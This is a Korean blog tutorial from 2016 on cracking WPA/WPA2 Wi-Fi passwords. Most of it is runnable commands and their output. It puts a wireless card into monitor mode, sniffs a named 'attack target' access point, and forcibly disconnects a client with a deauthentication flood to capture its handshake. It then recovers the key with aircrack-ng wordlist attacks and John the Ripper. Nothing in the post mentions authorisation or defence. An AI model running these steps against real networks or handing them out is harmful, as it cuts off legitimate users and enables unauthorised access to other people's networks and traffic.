본문으로 바로가기

3) Wifi Wpa/wpa2 비밀번호 크랙

category Wifi 2016. 3. 6. 21:56

wpa/wpa2는 같은 방식으로 사전대입방식을 사용한다.
TKIP , AES , TKIP/AES 모두 크랙가능

Wlan0를 모니터링 모드로 실행

root@bt:~# airmon-ng start wlan0
 
 
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
 
PID Name
2625    dhclient3
3236    dhclient3
Process with PID 3199 (ifup) is running on interface wlan0
Process with PID 3236 (dhclient3) is running on interface wlan0
 
 
Interface   Chipset     Driver
 
wlan0       Ralink RT2870/3070  rt2800usb - [phy2]
            (monitor mode enabled on mon0)


공격대상 airodump-ng 로 스니핑 시작, 데이터는 wpa에 저장한다.

root@bt:~# airodump-ng -c 6 -w wpa --bssid 00:08:9F:64:DD:3C  mon0
 
 
 
 CH  6 ][ Elapsed: 1 min ][ 2016-01-28 07:39 ][ WPA handshake: 00:08:9F:64:DD:3
                                                                                
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH E
                                                                                
 00:08:9F:64:DD:3C  -127   1      997      513    3   6  54e  WPA  TKIP   PSK  W
                                                                                
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe    
                                                                                
 00:08:9F:64:DD:3C  DC:86:D8:24:02:0F  -32   48e-48e  1804      762            
 00:08:9F:64:DD:3C  68:A3:C4:EF:FD:8B  -32   54e-54e     0      100 


공격대상 AP에 접속중인 디바이스가 있으면 접속을 끊어버리고, 다시 접속을 하도록 유도한다.
WPA 방식은 공격대상 AP에 접속을 하는 디바이스와의 접속승인 패킷만 있으면 자신의 컴퓨터에서 비밀번호 크랙이 가능

root@bt:~# aireplay-ng --deauth 10 -a 00:08:9F:64:DD:3C -c DC:86:D8:24:02:0F mon0
08:08:32  Waiting for beacon frame (BSSID: 00:08:9F:64:DD:3C) on channel 6
08:08:33  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|64 ACKs]
08:08:33  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [49|66 ACKs]
08:08:34  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [39|67 ACKs]
08:08:34  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [29|64 ACKs]
08:08:35  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|64 ACKs]
08:08:36  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|63 ACKs]
08:08:36  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [ 0|63 ACKs]
08:08:37  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [23|64 ACKs]
08:08:38  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [20|64 ACKs]
08:08:38  Sending 64 directed DeAuth. STMAC: [DC:86:D8:24:02:0F] [37|66 ACKs]

접속 승인때 발생한 패킷을 스니핑하여 wpa 파일에 저장이 되었으면
aircrack-ng로 비밀번호를 크랙한다. (비밀번호 크랙방식은 사전 대입방식으로, 기본적으로 사전에 비밀번호가 있어야 비밀번호 크랙이 가능하다. 그래서 많은 양의 단어가 있는 사전을 구하는 것이 좋다)

root@bt:~# aircrack-ng wpa.cap -w /pentest/passwords/wordlists/rockyou.txt
Opening crack_wpa.cap
Read 4 packets.
 
   #  BSSID              ESSID                     Encryption
 
   1  00:08:9F:64:DD:3C  Wifitest              WPA (1 handshake)
 
Choosing first network as target.
 
Opening crack_wpa.cap
Reading packets, please wait...
 
                                 Aircrack-ng 1.1 r2178
 
 
                   [00:00:00] 1 keys tested (466.31 k/s)
 
 
                           KEY FOUND! [ 12345678 ]
 
 
      Master Key     : 0C 11 EE A1 B7 6F F4 D4 7C 65 2B 73 78 6D C6 A4
                       1A B3 D4 68 E5 BE EF 5C AA 29 67 AC 9C 7C 27 7E
 
      Transient Key  : 59 77 8A D7 7F 38 64 67 F4 2C 58 86 5F 2A AC 44
                       A1 F3 1E 5F 84 1F E6 95 F3 69 5D 76 C6 3A 39 6C
                       68 A5 32 0B F6 6B 82 16 C0 72 A2 68 A4 D2 C6 2B
                       39 E7 8D 73 99 D2 C5 9C F3 7D D3 03 19 A0 A8 28
 
      EAPOL HMAC     : 91 A1 F0 FD C9 75 D1 54 01 14 84 EC 04 D9 CB AA
root@bt:~#



사전대입방식이어서 자신만의 사전이 없으면 기본 내장되어 있는 사전을 이용하거나 자동으로 생성하는 프로그램을 이용해보자

John the ripper으로 비밀번호 풀기(자동생성 비밀번호)
root@bt:~# /pentest/password/john/john --stdout --incremental:all | aircrack-ng -b 00:08:9F:64:DD:3C -w  crack_output.txt-01.ivs
 
 
기본내장 비밀번호로 풀기
root@bt:~# aircrack-ng crack_output.txt-01.ivs -w /pentest/passwords/wordlists/darkc0de.lst
 
rockyou.txt로 풀기
root@bt:~# aircrack-ng wpa-01.cap -w /pentest/passwords/wordlists/rockyou.txt


'Wifi' 카테고리의 다른 글

4) Wifi Wpa/Wpa2 비밀번호 크랙 가속화  (0) 2016.03.06
2) Wifi Wep 비밀번호 크랙  (0) 2016.03.02
1) Wifi 패킷 스니핑  (0) 2016.03.02